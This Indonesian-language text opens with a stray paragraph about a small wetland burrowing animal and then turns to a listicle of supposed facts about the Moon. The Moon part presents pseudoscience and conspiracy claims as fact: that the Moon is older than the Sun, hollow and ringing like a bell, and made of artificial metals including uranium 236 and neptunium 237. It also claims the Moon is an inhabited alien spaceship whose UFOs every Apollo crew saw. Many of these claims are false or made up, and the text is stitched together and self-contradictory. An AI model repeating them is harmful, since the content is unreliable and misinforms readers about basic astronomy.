Dia tinggal di daerah dataran rendah yang basah dan makan invertebrata kecil, serangga air, cacing, dan moluska. Dia adalah perenang yang baik dan dapat mencari makanan di sepanjang bagian bawah sungai dan kolam.Binatang ini menggali terowongan permukaan dangkal untuk mencari makan.Siang dan malam dia aktif dan tetap aktif di musim dingin. Sedikit yang diketahui tentang perilaku sosial spesies ini.

Fakta Fakta Tentang Bulan



Usia Bulan:

Usia bulan lebih tua dari yang diperkirakan, bahkan diperkirakan lebih tua daripada bulan dan matahari itu sendiri! Umur Bumi paling tua yang bisa diperkirakan adalah 4.6 Milyar tahun. Sementara itu batuan Bulan malah sudah berumur 5.3 Milyar tahun. Bulan lebih tua 1 milyar tahun ketimbang Bumi!

Lebih keras diatas:
Normalnya sebuah planet akan keras di dalam dan makin lama makin lembut diatas, seperti bumi kita. Tidak demikian hal nya dengan bulan. Bagian dalam bulan seperti berongga, sementara bagian atasnya keras sekeras Titanium. Hal ini lah yang menyebabkan bahwa bulan bagaimanapun juga sangat kuat dan tahan serangan. Kawah terbesar di Bulan berdiameter 300KM, dengan kedalaman hanya 6.4KM. Sementara itu, menurut hitungan ilmuwan, jika batuan yang menubruk bulan tadi, menubruk Bumi, maka akan terbentuk lubang paling tidak sedalam 1.200KM!

Bulan yang berongga juga dibuktikan saat kru Apollo yang meninggalkan Bulan, membuang kembali sisa pesawat yang tidak digunakan kembali ke Bulan . Hasilnya, sebuah gempa dan gema pada permukaan bulan terjadi selama 15 menit. Penemuan ini diulang kembali oleh kru Apollo 13, yang kali ini jatuh lebih keras, menimbulkan gema selama 3 jam 20 menit.

Ibaratnya seperti sedang membunyikan lonceng yang kemudian berdentang, hanya saja karena tidak ada udara, maka suara dentang lonceng yang dihasilkan tidak bisa didengar oleh manusia. Sementara itu, penemuan ini dipertanyakan oleh Carl Sagan, bahwa satelit alamiah nggak mungkin kopong dalam nya.

Bebatuan Bulan:
Asal usul batuan dan debu bulan sendiri tidak jelas, karena perbedaan komposisi pembentuk bulan yang berbeda sekali dengan komposisi batuannya. Batu yang pernah diambil team apollo sebesar 380KG lebih, menunjukkan ada nya bahan unik dan langka seperti Titanium murni, kromium, itrium, dan lain lain. Logam ini sangat keras, tahan panas, anti oksidasi. Jenis logam ini tidak terdapat secara alamiah di alam, dan jelas tidak mungkin terbentuk secara alamiah.

Para ilmuwan juga mengalami kesulitan menembus sisi luar bulan sewaktu mereka mengebor bagian terluar bulan. Setelah di teliti, bagian yang di bor tadi adalah sebuah mineral dengan kandungan titanium, uranium 236 dan neptunium 237. Bahan bahan super keras anti karat, yang juga tidak mungkin terbentuk secara alamiah, karena digunakan di bumi untuk membuat pesawat stealth. Kemungkinan besar, ini logam hasil sepuhan manusia!

Batuan bulan juga entah bagaimana sangat magnetik. Padahal tidak ada medan magnet di Bulan itu sendiri. Berbeda dengan bumi yang banyak sekali mengandung medan magnet.

Air menguap:
Pada 7 Maret 1971, instrumen bulan yang dipasang oleh astronot merekam adanya air melewati permukaan bulan. Uap air tadi bertahan hingga 14 jam dan menutupi permukaan seluas 100 mil persegi.

Ukuran bulan = Matahari?
Bulan bisa menutupi matahari dalam gerhana bulan total, tapi ukurannya tidak sama. Yang menarik, jarak matahari ke bumi persis 395 kali lipat jarak bulan ke bumi, sedangkan diameter matahari persis 395 kali diameter bulan. Pada saat gerhana matahari total, ukuran bumi dan bulan persis sama, sehingga matahari bisa tertutup bulan secara sempurna. Hitungan ini terlalu cermat dan akurat jika hanya merupakan kebetulan astronomi semata.

Orbit yang aneh:
Orbit bulan merupakan satu satunya yang benar benar hampir bulat sempurna dari semua sistem tata surya kita. Berat utama bulan terletak lebih dekat 6000 kaki ketimbang pusat geometris nya, yang harusnya justru mengakibatkan orbit lengkung. Sesuatu yang tidak diketahui telah membuat bulan stabil pada poros nya. Suatu teori yang belum di yakini benar adanya juga mengatakan bahwa wajah bulan yang selalu sama di setiap hari nya karena adanya suatu hal yang menyebabkan itu. Yang pada intinya, tetap suatu kebetulan astronomi.

Asal usul bulan:
Teori bahwa bulan tadinya adalah sebagian dari bumi yang mental keluar bumi karena tumbukan hebat di masa lalu hampir saja di setujui oleh semua orang, setelah sebelumnya mereka mengira bahwa bulan terbentuk dari debu debu angkasa yang mampat menjadi satelit bumi. Belakangan ini teori menyebutkan bahwa jika bagian sebesar bulan terambil dari bumi, maka bumi tidak akan bisa bulat seperti sekarang. Dan jika bulan tidak berongga, maka tidak mungkin bulan bisa berada menjadi satelit bumi. Terlalu berat dan bulan akan menghantam bumi.

Teori teori asal usul bulan kembali dipertanyakan, dan teori paling gila sepanjang sejarah mulai muncul, bahwa bulan diciptakan dengan sengaja oleh manusia terdahulu sebagai alat bantu dalam navigasi dan juga astronomi!

Bulan adalah kapal luar angkasa?
Kesempurnaan bulan yang keterlaluan, dan berbagai anomali yang ada dibulan, plus ditambah banyaknya benda benda terbang tak dikenal di bulan membuat banyak pihak mengatakan bahwa kemungkinan besar bulan adalah sebuah pesawat luar angkasa super besar yang diciptakan oleh mahluk cerdas pendahulu kita. Dan bulan BELUM ditinggalkan oleh penghuni nya! Semua kru Apollo dan astronot astronot lain atau peneliti bulan, semuanya telah melihat cahaya cahya adan benda benda terbang tak dikenal yang lalu lalang diantara bulan, muncul dan hilang begitu saja, bahkan selalu menyertai setiap kedatangan dan kepergian para team astronot yang mengunjungi bulan.